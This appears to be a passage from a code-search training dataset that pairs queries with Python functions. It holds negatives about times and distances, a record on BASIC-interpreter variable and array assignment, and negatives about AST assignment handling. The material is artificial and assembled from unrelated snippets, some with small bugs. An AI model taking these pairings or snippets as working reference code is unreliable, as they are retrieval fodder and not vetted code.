distance > 700 and distance < 1400:\n deltime = 48\n else:\n deltime = 72\n\n print('--- Tiempo de ejecucion calcDeliveryTime: {} segundos ---'.format((time.time() - start_time)))\n\n return deltime, distance", "def get_time(network, road_id):\n return network[0][road_id][4]", "def route_info_helper(g, origin, destination, distance):\n time = 0 \n acceleration = 1406.25\n \n if(distance > 400):\n time = time + 0.53 + 0.53\n distance = distance - 400\n time = time + distance / 750\n else:\n half = distance / 2.0\n time = time + 2 (math.sqrt((2 * half) / acceleration))\n \n \n flights_out = g.city_dict[destination].get_flights_out()\n number = len(flights_out)\n time = time + (2.1 - (0.1 * number))\n \n return time", "def duration(self):\r\n return (self.end_time or time.time()) - self.start_time", "def get_coverage_time(self):\n res1 = self.get_attr('time_coverage_start')\n res2 = self.get_attr('time_coverage_end')\n return (res1, res2)", "def get_time(self) -> float:\n return self.player.time", "def trame_distance(t1, t2):\n return np.linalg.norm(t1 - t2)", "def getTravelTimes(self): \n nrec = self.nrec\n nsrc = self.nsrc\n if (nrec < 1): \n print(\"No receiver locations set\")\n return None\n if (nsrc < 1):\n print(\"No sources\")\n ttr = ascontiguousarray(zeros(nrec*nsrc), dtype='float64')\n ttrPointer = ttr.ctypes.data_as(POINTER(c_double))\n ierr = c_int(1)\n self.fteik2d.fteik_solver2d_getTravelTimes64f(nrec, ttrPointer, ierr)\n if (ierr.value != 0): \n print(\"Error getting travel times\")\n return None\n if (nsrc > 1):\n ttr = reshape(ttr, [self.nrec, self.nsrc], order='F')\n return ttr", "def dist(gene1, gene2):\n return abs(len(gene1.goal) - len(gene2.goal))", "def duration(self) -> float:\n return time.time() - self.connect_time", "def dep_time(self):\n return self._dep_time", "def runtime(self):\n return self.stop_time - self.start_time", "def get_time_elapsed(self):\n return self.__time_elapsed", "def distanceTwoPoints(self, A, B):\r\n # productive\r\n # used by addNeedleToScene\r\n if frequent: profprint()\r\n length = ((A[0] - B[0]) ** 2 + (A[1] - B[1]) ** 2 + (A[2] - B[2]) ** 2) ** 0.5\r\n return length", "def elapsed(self):\n return datetime.datetime.now() - self.start", "def getTime(self):\n return self.step / (self.max_step + int(self.include))", "def get_elapsed_time(self):\n\n return datetime.timedelta(seconds=int(time.time() - self.start_time))", "def get_distance(start, end):\n\n\t\tloc_start, loc_end, dst_node = create_distance(start, end)\n\t\tdistance = cmds.getAttr(\"%s.distance\" % dst_node)\n\n\t\tcmds.delete([loc_start, loc_end, dst_node])\n\n\t\treturn distance", "def runtime(self):\n return (self.time - self.start).total_seconds()", "def part_two():\n tasks = {}\n current_time = 0\n while G.nodes():\n # noinspection PyCallingNonCallable\n candidate_next_tasks = [task for task in G.nodes()\n if task not in tasks.keys() and G.in_degree(task) == 0]\n if candidate_next_tasks and len(tasks) < 5:\n next_task = sorted(candidate_next_tasks)[0]\n tasks[next_task] = ord(next_task) - 4\n else:\n min_task_time = min(tasks.values())\n current_time += min_task_time\n completed_task = dict(zip(tasks.values(), tasks.keys()))[min_task_time]\n tasks = {k: v - min_task_time for k, v in tasks.items() if k != completed_task}\n G.remove_node(completed_task)\n return current_time", "def current_time(cls) -> float:", "def GetTimeAndDurationOfTripSinceDeparture(PathInfo):\r\n\tif not PathInfo:\r\n\t\treturn None \r\n\tif len(PathInfo) < 2: return None \r\n\r\n\tdeparture_first_station = PathInfo[1][ConnInfoInd['departure_hour']]*60 + PathInfo[1][ConnInfoInd['departure_min']]\r\n\r\n\tarrival_last_station = PathInfo[-1][ConnInfoInd['arrival_hour']]*60 + PathInfo[-1][ConnInfoInd['arrival_min']]\r\n\tTotalDuration = arrival_last_station - departure_first_station\r\n\treturn (TotalDuration, departure_first_station, arrival_last_station)", "def road_travel(self, path, vehicle_type):\n # last node in path\n # is destination\n if len(path) < 2:\n return\n\n leg = path[0]\n if vehicle_type is VehicleType.Public:\n edge = self.transit_roads.network[leg.frm][leg.to][leg.edge_no]\n else:\n edge = self.roads.network[leg.frm][leg.to][leg.edge_no]\n\n # where leg.p is the proportion of the edge we travel\n time = self.roads.router.edge_travel_time(edge) * leg.p\n\n return leg, edge, time", "def queued_time(self):\r\n return (self.node_monitor_launch_time - self.node_monitor_submit_time)", "def print_train_time(start, end, device=None):\n total_time = end - start\n print(f\"\\nTrain time on {device}: {total_time:.3f} seconds\")\n return total_time", "def distance( self, source, target ):\n return nx.shortest_path_length(self._G, source, target)", "def elapsed_time(self):\n return self.__elapsed_time", "def time(self) -> int:\n return self.__droneTime", "def lineLength(node1, node2):\n return ((node2[1] - node1[1])**2 + (node2[0] - node1[0])**2)**(1/2)", "def tunnel2_bgp_holdtime(self) -> pulumi.Output[int]:\n return pulumi.get(self, \"tunnel2_bgp_holdtime\")", "def duration(self):\n return self.end_time - self.start_time", "def time(self):\n raise \"use method time of class ReactorNet\"\n #return _cantera.reactor_time(self.__reactor_id)", "def getDistanceBetweenTwoPoints(self, one, two):\n dx = one.x - two.x\n dy = one.y - two.y\n return math.sqrt(dx * dx + dy * dy)", "def dist(v1, v2):\n return ( (v1[0] - v2[0])**2 + (v1[1] - v2[1])**2 )**0.5" ]
[ "0.69388837", "0.6491376", "0.64647245", "0.644064", "0.64244837", "0.64106727", "0.64093053", "0.6311803", "0.6295542", "0.61754763", "0.6144564", "0.613612", "0.61312324", "0.5971906", "0.59415174", "0.5910606", "0.5904154", "0.5904154", "0.59017485", "0.58911026", "0.5867693", "0.58613896", "0.5855374", "0.58447486", "0.5828466", "0.58070576", "0.57984656", "0.5795412", "0.5771729", "0.5765164", "0.56907415", "0.5670746", "0.56682986", "0.56636024", "0.562321", "0.5611932", "0.56091034", "0.5601874", "0.5598441", "0.5597963", "0.5592729", "0.557365", "0.5567834", "0.554714", "0.55455947", "0.5544582", "0.554291", "0.55402213", "0.55398345", "0.5538411", "0.5511942", "0.55040485", "0.5496998", "0.5485866", "0.5485846", "0.548223", "0.54793936", "0.5479138", "0.54778624", "0.5473173", "0.5468491", "0.54655224", "0.54590774", "0.54581517", "0.5455923", "0.54480493", "0.5447103", "0.54462856", "0.5441164", "0.5435649", "0.54320824", "0.543087", "0.54254633", "0.5420291", "0.5413558", "0.5412594", "0.5411067", "0.54068005", "0.54064447", "0.5404104", "0.53981924", "0.53943276", "0.53916657", "0.53812635", "0.5365424", "0.53653497", "0.53621364", "0.53595394", "0.53503644", "0.5345062", "0.53420836", "0.5334154", "0.5333674", "0.53323317", "0.5329427", "0.5329157", "0.5325875", "0.53218323", "0.53217274", "0.5318948", "0.5315421" ]
0.0
-1
Variable assignment can include assigning array elements.
def assign_variable(executor, variable, value): variable = variable.replace(" ", "") # TODO Should move parsing of this to ParsedStatementLet. # TODO Need to handle N-dimensional array element assignment. i = variable.find("(") if i != -1: # Array reference j = variable.find(")", i+1) if j == -1: raise BasicSyntaxError(F"Missing ) in in array assignment to {variable}") if i+1 == j: raise BasicSyntaxError(F"Missing array subscript in assignment to {variable}") subscripts = variable[i+1:j].split(",") variable = variable[:i] is_valid_identifier(variable) subscripts = [int(eval_expression(executor._symbols, subscript)) - 1 for subscript in subscripts] executor.put_symbol_element(variable, value, subscripts) else: is_valid_identifier(variable) executor.put_symbol(variable, value, symbol_type=SymbolType.VARIABLE, arg=None)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_50_assign_statement(self):\n\t\tinput = \"\"\"var x,y:integer;\n\t\tfunction f(): array[1 .. 3] of real;\n\t\tvar a: array[1 .. 3] of real;\n\t\tbegin a[2]:=1.1; return a; end\n\t\tprocedure main(); var x:array[1 .. 2]of real;\n\t\tbegin f()[1]:=x[1]:=1; with y:real;y:real; do begin end end\"\"\"\n\t\texpect = \"Redeclared Variable: y\"\n\t\tself.assertTrue(TestChecker.test(input,expect,450))", "def test_47_assign_statement(self):\n\t\tinput = \"\"\"var x,y:integer;\n\t\tfunction f(): array[1 .. 3] of real;\n\t\tvar a: array[1 .. 3] of real;\n\t\tbegin a[2]:=1.1; return a; end\n\t\tprocedure main(); var x:array[1 .. 3]of real;\n\t\tbegin f()[1]:=x[1]:=1; with y:real;y:real; do begin end end\"\"\"\n\t\texpect = \"Redeclared Variable: y\"\n\t\tself.assertTrue(TestChecker.test(input,expect,447))", "def test_46_assign_statement(self):\n\t\tinput = \"\"\"var x,y:integer;\n\t\tprocedure main(); var x:array[1 .. 3]of real; begin x[1]:=1;\n\t\twith y:integer;y:real; do begin end end\"\"\"\n\t\texpect = \"Redeclared Variable: y\"\n\t\tself.assertTrue(TestChecker.test(input,expect,446))", "def test_48_assign_statement(self):\n\t\tinput = \"\"\"var x,y:integer;\n\t\tfunction f(): array[1 .. 3] of real;\n\t\tvar a: array[1 .. 2] of real;\n\t\tbegin a[2]:=1.1; return a; end\n\t\tprocedure main(); var x:array[1 .. 3]of real;\n\t\tbegin f()[1]:=x[1]:=1; end\"\"\"\n\t\texpect = \"Type Mismatch In Statement: Return(Some(Id(a)))\"\n\t\tself.assertTrue(TestChecker.test(input,expect,448))", "def test_49_assign_statement(self):\n\t\tinput = \"\"\"var x,y:integer;\n\t\tfunction f(): array[1 .. 2] of real;\n\t\tvar a: array[1 .. 3] of real;\n\t\tbegin a[2]:=1.1; return a; end\n\t\tprocedure main(); var x:array[1 .. 3]of real;\n\t\tbegin f()[1]:=x[1]:=1; end\"\"\"\n\t\texpect = \"Type Mismatch In Statement: Return(Some(Id(a)))\"\n\t\tself.assertTrue(TestChecker.test(input,expect,449))", "def _AugAssign(self, t):\n if not isinstance(t.target, ast.Name):\n self.RaiseError(t, \"Augmented assignment to complex expressions not supported\")\n # check if target exists in locals\n if t.target.id not in self._locals :\n self.RaiseError(t, \"Augmented assignment not permitted on variables not already assigned previously\")\n self.fill()\n self.dispatch(t.target)\n self.write(\" \"+self.binop[t.op.__class__.__name__]+\"= \")\n self.dispatch(t.value)\n self.write(\";\")", "def visit_Assign(self, node):\n self.generic_visit(node)\n target = get_single_target(node)\n if isinstance(target, ast.Subscript):\n fun = to_attribute(self.operator, 'setitem')\n args = [target.value, self.index_to_expr(target.slice), node.value]\n return ast.Expr(to_call(fun, args))\n return node", "def visit_VarAssignNode(self, node: VarAssignNode, symbol_table: SymbolTable) -> None:\n if isinstance(node.name, AccessNode) and isinstance(node.name.item_to_access, NumberNode):\n var = self.visit(node.name.accessor, symbol_table)\n var.vals[int(node.name.item_to_access.tok.value)] = self.visit(node.value, symbol_table)\n if isinstance(var, List):\n var.value = [item[idx].value for idx, item in enumerate(var.vals.values())]\n else:\n return f'Strings are immutable'\n else:\n assignment = self.visit(node.value, symbol_table)\n\n symbol_table[node.name] = assignment", "def visit_assign(self: Parser, node: doc.Assign) -> None:\n if len(node.targets) != 1:\n self.report_error(node, \"Consequential assignments like 'a = b = c' are not supported.\")\n lhs = node.targets[0]\n\n if isinstance(node.value, doc.Subscript):\n check_slices = []\n if isinstance(node.value.slice, doc.Slice):\n check_slices = [node.value.slice]\n elif isinstance(node.value.slice, doc.Tuple):\n for p in node.value.slice.elts:\n if isinstance(p, doc.Slice):\n check_slices.append(p)\n for s in check_slices:\n if not s.step and s.upper and s.lower:\n s.step = doc.Constant(\n 1,\n None,\n 1,\n 1,\n s.upper.lineno,\n s.upper.end_col_offset + 1,\n s.upper.lineno,\n s.upper.end_col_offset + 2,\n )\n\n rhs = self.eval_expr(node.value)\n if isinstance(lhs, doc.Subscript):\n if isinstance(lhs.slice, doc.Tuple):\n indices = []\n for index in lhs.slice.elts:\n indices.append(self.eval_expr(index))\n else:\n indices = self.eval_expr(lhs.slice)\n T.buffer_store(self.eval_expr(lhs.value), rhs, indices)\n else:\n self.eval_assign(target=lhs, source=rhs, bind_value=bind_assign_value)", "def assign(array1, array2):\n for i in range(len(array1)):\n array2[i] = array1[i]", "def _Assign(self, t):\n if len(t.targets) > 1:\n self.RaiseError(t, \"Assignment to multiple targets not supported\")\n if not isinstance(t.targets[0], ast.Name):\n self.RaiseError(t, \"Assignment to complex expressions not supported\")\n self.fill()\n # check if target exists in locals\n if t.targets[0].id not in self._locals :\n self.write(\"auto \")\n self._locals.append(t.targets[0].id)\n self.dispatch(t.targets[0])\n self.write(\" = \")\n self.dispatch(t.value)\n self.write(\";\")", "def visit_Assign(self, node):\n var_name = node.left.value\n self.VARIABLES[var_name] = self.visit(node.right)", "def eval_assignment(exp, env):\n set_variable_value(assignment_variable(exp), m_eval(assignment_value(exp), env), env)\n return quote(\"ok\")", "def checkVarArray(self, script, node):\n\n if isinstance(node.value, ast.Call):\n if isinstance(node.value.func, ast.Name):\n if node.value.func.id == 'Var':\n if len(node.value.args) > 0:\n for target in node.targets:\n if isinstance(target, ast.Attribute):\n if isinstance(target.value, ast.Name):\n if target.value.id in script.modelVars:\n if target.value.id not in self.varArrays:\n self.varArrays[target.value.id] = []\n self.varArrays[target.value.id].append(target.attr)", "def set_assignment(self, var, value):\n self.variable_to_value[var] = value", "def _assign_op(dest, op, arg, val, path, scope):\n if op == '[':\n dest[arg] = val\n elif op == '.':\n setattr(dest, arg, val)\n elif op == 'P':\n _assign = scope[TargetRegistry].get_handler('assign', dest)\n try:\n _assign(dest, arg, val)\n except Exception as e:\n raise PathAssignError(e, path, arg)\n else: # pragma: no cover\n raise ValueError('unsupported T operation for assignment')", "def varcopy(self, vars):", "def assign_variable(self, name, value):\n return self.set_variable(name, value)", "def _var_update(self, **kwargs):\n for k, v in kwargs.items():\n if v is not None:\n v = np.asanyarray(v)\n\n if not hasattr(self, k):\n setattr(self, k, v)\n elif v is not None:\n setattr(self, k, v)\n \n self._var_check()", "def assign(ary, out):\n\n from . import _bh\n\n if not np.isscalar(ary):\n (ary, out) = broadcast_arrays(ary, out)[0]\n # We ignore self assignments\n if _bh.same_view(ary, out):\n return\n\n # Assigning empty arrays doesn't do anything\n if hasattr(ary, \"size\"):\n if ary.size == 0:\n return\n if hasattr(out, \"size\"):\n if out.size == 0:\n return\n\n # We use a tmp array if the in-/out-put has memory conflicts\n if overlap_conflict(out, ary):\n tmp = array_create.empty_like(out)\n assign(ary, tmp)\n return assign(tmp, out)\n\n if bhary.check(out):\n _bh.ufunc(UFUNCS[\"identity\"].info['id'], (out, ary))\n else:\n if bhary.check(ary):\n if \"BH_SYNC_WARN\" in os.environ:\n import warnings\n warnings.warn(\"BH_SYNC_WARN: Copying the array to NumPy\", RuntimeWarning, stacklevel=2)\n ary = ary.copy2numpy()\n out[...] = ary", "def assign(self, *args):\n return _ida_hexrays.cloop_t_assign(self, *args)", "def visit_AugAssign(self, node):\n target = node.target\n\n rhs_target = copy.deepcopy(target)\n rhs_target.ctx = ast.Load()\n ast.fix_missing_locations(rhs_target)\n\n bin_op = ast.BinOp(rhs_target, node.op, node.value)\n assignment = ast.Assign([target], bin_op)\n assignment.inplace_op = node.op\n return self.visit(assignment)", "def irgen_assign(stmt, builder, table):\n lvalue = irgen_lvalue(stmt.exprs[0], builder, table)\n expr = irgen_expr(stmt.exprs[1], builder, table)\n builder.store(expr, lvalue)", "def __call__(self, elementname, name, master):\n self._name = name\n self._master = master\n if elementname not in self._elementvars:\n v = ArrayElementVar(varname=self._name, elementname=elementname, master=self._master)\n self._elementvars[elementname] = v\n return self._elementvars[elementname]", "def assign(self, V, py):\n V.value = py", "def assign(self, V, py):\n V.value = py", "def assign(self, V, py):\n V.value = py", "def assign(self, V, py):\n V.value = py", "def assign(self, assignee: np.ndarray):\n if isinstance(self.data, pd.DataFrame):\n self.data = pd.concat([self.data, assignee], axis=1, ignore_index=True)\n else:\n self.data = pd.DataFrame(data=assignee)", "def setUniformValueArray(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads\n pass", "def visit_AugAssign(self, node):\n self.generic_visit(node)\n stmts = []\n target = node.target\n if not isinstance(target, ast.Subscript):\n return node\n\n # AST node for target value, gensym-ed if necessary.\n if self.can_reevaluate(target.value):\n target_node = target.value\n else:\n target_node = to_name(gensym())\n stmts.append(ast.Assign(\n [set_ctx(target_node, ast.Store())], target.value))\n \n # AST node for index, gensym-ed if necessary.\n index_expr = self.index_to_expr(target.slice)\n if self.can_reevaluate(index_expr):\n index_node = index_expr\n else:\n index_node = to_name(gensym())\n stmts.append(ast.Assign(\n [set_ctx(index_node, ast.Store())], index_expr))\n \n # Main AST node for the indexed augemented assignment.\n stmts.append(ast.Expr(\n to_call(to_attribute(self.operator, 'setitem'), [\n target_node,\n index_node,\n to_call(self.op_to_function(node.op), [\n to_call(to_attribute(self.operator, 'getitem'), [\n target_node,\n index_node,\n ]),\n node.value\n ])\n ])\n ))\n\n return stmts", "def multiple_value_call_assignment_handler(target, value, assign_stmts, node, id_str):\n #print(\"multiple_value_call_assignment_handler\")\n target_stmts, value_var = stypy_functions.create_temp_Assign(value, node.lineno, node.col_offset,\n \"{0}_assignment\".format(id_str))\n assign_stmts.append(target_stmts)\n\n #value_var_to_load = copy.deepcopy(value_var)\n value_var_to_load = ast.Name()\n value_var_to_load.col_offset = value_var.col_offset\n value_var_to_load.lineno = value_var.lineno\n value_var_to_load.id = value_var.id\n value_var_to_load.ctx = ast.Load()\n\n for i in xrange(len(target.elts)):\n # Assign values to each element.\n # getitem_att = core_language.create_attribute(value_var_to_load, '__getitem__', context=ast.Load(),\n # line=node.lineno,\n # column=node.col_offset)\n # item_call = functions.create_call(getitem_att, [core_language.create_num(i, node.lineno, node.col_offset)])\n # temp_stmts, temp_value = stypy_functions.create_temp_Assign(item_call, node.lineno, node.col_offset,\n # \"{0}_assignment\".format(id_str))\n stypy_interface = core_language.create_Name('stypy_interface')\n get_tuple_call = core_language.create_attribute(stypy_interface, 'stypy_get_value_from_tuple', context=ast.Load(),\n line=node.lineno,\n column=node.col_offset)\n\n item_call = functions.create_call(get_tuple_call, [value_var_to_load,\n core_language.create_num(len(target.elts), node.lineno, node.col_offset),\n core_language.create_num(i, node.lineno, node.col_offset)])\n temp_stmts, temp_value = stypy_functions.create_temp_Assign(item_call, node.lineno, node.col_offset,\n \"{0}_assignment\".format(id_str))\n if hasattr(node, 'lineno'):\n temp_stmts.lineno = node.lineno\n temp_stmts.col_offset = node.col_offset\n\n assign_stmts.append(temp_stmts)\n\n temp_stmts = core_language.create_Assign(target.elts[i], temp_value)\n if hasattr(node, 'lineno'):\n temp_stmts.lineno = node.lineno\n temp_stmts.col_offset = node.col_offset\n\n assign_stmts.append(temp_stmts)\n\n return True", "def visit_simple_assign(self, node):\n temp = gensym()\n temp_target = to_name(temp, ast.Store())\n stmts = [ ast.Assign([temp_target], node.value) ]\n stmts += [ ast.Assign([target], to_name(temp))\n for target in node.targets ]\n return stmts", "def visit_Assign(self, node):\n self.generic_visit(node)\n is_multiple = len(node.targets) > 1\n is_compound = any(map(is_sequence_node, node.targets))\n is_simple = not is_compound\n if is_simple and is_multiple:\n return self.visit_simple_assign(node)\n elif is_compound and (is_multiple or is_sequence_node(node.value)):\n return self.visit_compound_assign(node)\n return node", "def assign(self, *args):\n return _ida_hexrays.cexpr_t_assign(self, *args)", "def visit_compound_assign(self, node):\n # Determine number of values (arity) of compound assignment.\n nvalues = { len(target.elts) for target in node.targets \n if is_sequence_node(target) }\n if len(nvalues) > 1:\n # A multiple, compound assignment with different arities, e.g.,\n # `x,y = a,b,c = ...` is not a syntax error in Python, though it\n # probably should be because it's guaranteed to cause a runtime\n # error. Raise the error here, since we cannot proceed.\n raise SyntaxError(\"Multiple assignment with different arities\")\n nvalues = nvalues.pop()\n\n # Assign temporary variables.\n temps = [ gensym() for i in range(nvalues) ]\n stmts = []\n if is_sequence_node(node.value) and len(node.value.elts) == nvalues:\n # Special case: RHS is sequence literal of correct length.\n for i in range(nvalues):\n temp_target = to_name(temps[i], ast.Store())\n stmts.append(ast.Assign([temp_target], node.value.elts[i]))\n else:\n # General case.\n temp_target = to_tuple(\n (to_name(temp, ast.Store()) for temp in temps), ast.Store())\n stmts.append(ast.Assign([temp_target], node.value))\n\n # Rewrite assignments as sequence of assignments.\n for target in reversed(node.targets):\n if is_sequence_node(target):\n stmts.extend(ast.Assign([target.elts[i]], to_name(temps[i]))\n for i in range(nvalues))\n else:\n temp_tuple = to_tuple(to_name(temp) for temp in temps)\n stmts.append(ast.Assign([target], temp_tuple))\n \n return stmts", "def assign_operator(cls, quad):\n\t\tvalue = cls.get_address_value(quad.left_operand)\n\t\tif quad.right_operand :\n\t\t\tcls.set_arr_value(quad.result, quad.right_operand, value)\n\t\telse:\n\t\t\tcls.set_address_value(quad.result, value)", "def variable(self, val):", "def variabilize(self):\n if self.nvars>=0:\n pass #already done\n else:\n varTab = syt.SymbolTable()\n def convertArgs(args):\n return map(lambda a: -varTab.getId(a) if isVariableAtom(a) else a, args)\n def convertGoal(g):\n return Goal(g.functor, convertArgs(g.args))\n if self.lhs: self.lhs = convertGoal(self.lhs)\n self.rhs = map(convertGoal, self.rhs)\n if self.features:\n self.features = map(convertGoal, self.features)\n if self.findall:\n self.findall = map(convertGoal, self.findall) \n self.variableList = varTab.getSymbolList()\n self.nvars = len(self.variableList)", "def setVariable(self, *args):\n return _libsbml.EventAssignment_setVariable(self, *args)", "def __setitem__(self, idx, value):\n if not isinstance(value, nodes.Node):\n raise NotImplementedError(\"setitem with non-blaze rhs\")\n result = self.getitem(idx, context='set')\n result = Assign('assign', [result, value])\n result.eval()", "def bind_assign_value(self: Parser, node: doc.expr, var_name: str, value: Any) -> Any:\n if isinstance(value, T.meta_var):\n return value.value\n elif isinstance(value, (list, tuple)):\n for i, v in enumerate(value):\n bind_assign_value(self, node, f\"{var_name}_{i}\", v)\n return value\n elif isinstance(value, Frame):\n value.add_callback(partial(value.__exit__, None, None, None))\n res = value.__enter__()\n IRBuilder.name(var_name, res)\n return res\n elif isinstance(value, (Buffer, IterVar)) or (\n isinstance(value, Var) and not self.var_table.exist(value)\n ):\n IRBuilder.name(var_name, value)\n return value\n else:\n value = tvm.runtime.convert(value)\n frame = T.LetStmt(value)\n var = frame.var\n IRBuilder.name(var_name, var)\n frame.add_callback(partial(frame.__exit__, None, None, None))\n frame.__enter__()\n return var", "def visit_aug_assign(self: Parser, node: doc.AugAssign) -> None:\n lhs_pos = (\n node.target.lineno,\n node.target.col_offset,\n node.target.end_lineno,\n node.target.end_col_offset,\n )\n rhs_pos = (\n node.value.lineno,\n node.value.col_offset,\n node.value.end_lineno,\n node.value.end_col_offset,\n )\n node.target.ctx = doc.Load(*lhs_pos)\n with self.var_table.with_frame():\n lhs_name = \"__tvm_tmp_value_aug_assign_lhs\"\n rhs_name = \"__tvm_tmp_value_aug_assign_rhs\"\n lhs_expr = self.eval_expr(node.target)\n rhs_expr = self.eval_expr(node.value)\n self.var_table.add(lhs_name, lhs_expr)\n self.var_table.add(rhs_name, rhs_expr)\n op = doc.BinOp(\n doc.Name(lhs_name, doc.Load(*lhs_pos), *lhs_pos),\n node.op,\n doc.Name(rhs_name, doc.Load(*rhs_pos), *rhs_pos),\n *lhs_pos,\n )\n rhs = self.eval_expr(op)\n lhs = node.target\n lhs.ctx = doc.Store(*lhs_pos)\n if isinstance(lhs, doc.Subscript):\n if isinstance(lhs.slice, doc.Tuple):\n indices = []\n for index in lhs.slice.elts:\n indices.append(self.eval_expr(index))\n else:\n indices = [self.eval_expr(lhs.slice)]\n T.buffer_store(self.eval_expr(lhs.value), rhs, indices)\n else:\n self.eval_assign(target=lhs, source=rhs, bind_value=bind_assign_value)", "def visit_ann_assign(self: Parser, node: doc.AnnAssign) -> None:\n lhs = node.target\n rhs = self.eval_expr(node.value)\n ann_var = self.visit_tvm_annotation(node.annotation)\n if not isinstance(ann_var, Var):\n self.report_error(node.annotation, \"Annotation should be Var\")\n self.eval_assign(target=lhs, source=ann_var, bind_value=bind_assign_value)\n frame = T.LetStmt(rhs, var=ann_var)\n frame.add_callback(partial(frame.__exit__, None, None, None))\n frame.__enter__()", "def visit_AugAssign(self, node):\n # FIXME: Gensym the LHS to avoid two evaluations.\n self.generic_visit(node)\n rhs = to_call(self.op_to_function(node.op),\n [set_ctx(node.target), node.value])\n return ast.Assign([node.target], rhs)", "def visit_Assign(self, node):\n self.generic_visit(node)\n\n if node.col_offset == 0:\n mnode = ast.parse(\"\")\n mnode.body = [node]\n mnode = ast.fix_missing_locations(mnode)\n code = compile(mnode, \"<ast>\", \"exec\")\n try:\n exec(code, self.globals_)\n except Exception:\n pass\n self.globals_.pop(\"__builtins__\", None)\n self.globals_.pop(\"builtins\", None)", "def __setitem__(self, item, value):\n self.vars[item] = value", "def test_variable_assign(self):\n self.trace('x = 1')\n\n events = self.variable_events\n self.assertEqual(len(events), 1)\n event = events[0]\n self.assertIsInstance(event, TraceAssign)\n self.assertEqual(event.name, 'x')\n self.assertEqual(event.value, 1)", "def test_45_assign_statement(self):\n\t\tinput = \"\"\"var x,y:integer;\n\t\tprocedure main(); var x:real; begin x:=1;\n\t\twith y:integer;y:real; do begin end end\"\"\"\n\t\texpect = \"Redeclared Variable: y\"\n\t\tself.assertTrue(TestChecker.test(input,expect,445))", "def update_variable_array(array,annuli,times,t,r,value):\n annulus=radius_to_annulus(r,annuli)\n annulus_start=np.sum(times[0:annulus])\n array[annulus_start+t]=value\n return ()", "def f_setvar(self, name, expr):\r\n self.locals_ptr[name] = self.eval(expr, self.locals_ptr)\r\n return \"\"", "def assign(self, *args):\n return _ida_hexrays.cinsn_t_assign(self, *args)", "def single_assignment_handler(target, value, assign_stmts, node, id_str):\n #print(\"single_assignment_handler\")\n\n temp_stmts = core_language.create_Assign(target, value)\n if hasattr(node, 'lineno'):\n temp_stmts.lineno = node.lineno\n temp_stmts.col_offset = node.col_offset\n\n assign_stmts.append(temp_stmts)\n return False", "def special_setitem(self, form):\n obj = self.reallyCompile(form[1])\n key = self.reallyCompile(form[2])\n value = self.reallyCompile(form[3])\n return ast.Assign([ast.Subscript(obj,\n 'OP_ASSIGN',\n [key])],\n value)", "def visit_Assign(self, node):\n var_name = node.left.token.value\n self.GLOBAL_SCOPE[var_name] = self.visit(node.right)", "def assign(self, name, values):\n self._assignments[name] = values", "def genAssign(self, varList, dataVariableName):\n\n tmpVar = self.genVar('tmp')\n #tmpVar = iter(dataVariableName)\n initPart = [tmpVar.assign( Call(Name('iter', Load()), [Name(dataVariableName, Load())], [], None, None))]\n\n moreVars = []\n affectations = []\n assignations = []\n for i, n in enumerate(varList.elts):\n myTmpName = self.genVar(i)\n affectations += [\n #tmpVar_<i> = tmpVar.next()\n myTmpName.assign( Call(tmpVar.load('next'), [], [], None, None ))\n ]\n\n if isinstance(n, Tuple) or isinstance(n, List):\n moreVars.append( (n, myTmpName.name) )\n else:\n assignations += [\n #var = tmpVar_<i>\n Assign( [n], myTmpName.load() )\n ]\n\n tryAssign = [\n # #try: affectations\n # TryExcept(\n # affectations,\n # #except StopIteration:\n # [ExceptHandler( Name('StopIteration', Load()), None, [\n # #raise ValueError(\"need more value to unpack\")\n # Raise(Call(Name('ValueError', Load()), [Str(\"need more value to unpack\")], [], None, None), None, None),\n # ]\n # )],\n # [])\n ]\n\n testMoreValue = [\n #try:\n TryExcept(\n #tmpVar.next()\n [ Expr(Call(tmpVar.load('next'), [], [], None, None )) ],\n #except StopIteration: pass\n [ExceptHandler( Name('StopIteration', Load()), None, [Pass()]) ],\n #else : raise ValueError(\"too many values to unpack\")\n [\n Raise(Call(Name('ValueError', Load()), [Str(\"too many values to unpack\")], [], None, None), None, None),\n\n ])\n ]\n\n return (initPart + tryAssign + testMoreValue, assignations, moreVars)", "def set_params(self, arr):\n self.arr = arr", "def val_at(self, *args, **kwargs):\n self.add_pc(1)\n self.pb[self.pc - 1] = \"ASSIGN\", _m(self.ss_i(0), \"@\"), _m(self.ss_i(0))", "def syntax_var_assign():\n a = 'Hello'\n print(f'{a} is stored at {hex(id(a))}')\n a = \"World\"\n print(f'{a} is stored at {hex(id(a))}')\n\n ## Output\n # Hello is stored at 0x10d251340\n # World is stored at 0x10d251378\n\n ## Notes\n # id()\n # Return the “identity” of an object. This is an integer (or long integer) which is guaranteed\n # to be unique and constant for this object during its lifetime.", "def assign_value(values, box, value):\n values[box] = value\n if len(value) == 1:\n assignments.append(values.copy())\n return values", "def assign_value(values, box, value):\n values[box] = value\n if len(value) == 1:\n assignments.append(values.copy())\n return values", "def assign_value(values, box, value):\n values[box] = value\n if len(value) == 1:\n assignments.append(values.copy())\n return values", "def assign_value(values, box, value):\n values[box] = value\n if len(value) == 1:\n assignments.append(values.copy())\n return values", "def assign_value(values, box, value):\n values[box] = value\n if len(value) == 1:\n assignments.append(values.copy())\n return values", "def visit_Assign(self, node):\n assign_stmts = []\n value = node.value\n reversed_targets = node.targets\n reversed_targets.reverse()\n assign_stmts.append(stypy_functions.create_blank_line())\n if len(reversed_targets) > 1:\n assign_stmts.append(\n stypy_functions.create_src_comment(\n \"Multiple assignment of {0} elements.\".format(len(reversed_targets))))\n else:\n if hasattr(node, 'lineno'):\n assign_stmts.append(stypy_functions.create_src_comment(\n \"Assigning a {1} to a {0} (line {2}):\".format(type(reversed_targets[0]).__name__,\n type(value).__name__, node.lineno)))\n else:\n assign_stmts.append(stypy_functions.create_src_comment(\n \"Assigning a {1} to a {0}:\".format(type(reversed_targets[0]).__name__,\n type(value).__name__)))\n for assign_num in xrange(len(reversed_targets)):\n target = reversed_targets[assign_num]\n # Function guard is true? execute handler\n for handler_func_guard_tuple in self.__assignment_handlers:\n if handler_func_guard_tuple[0](target, value):\n id_str, handler_func = handler_func_guard_tuple[1]\n self.performed_transformations |= handler_func(target, value, assign_stmts, node, id_str)\n assign_stmts = stypy_functions.flatten_lists(assign_stmts)\n value = target\n break\n\n if len(assign_stmts) > 0:\n return assign_stmts\n return node", "def assign(self, *args):\n return _ida_hexrays.cif_t_assign(self, *args)", "def set_variable_values(self, vars_values):\n raise NotImplementedError()", "def create_new_vararray_core(cfg_set,var):\r\n if 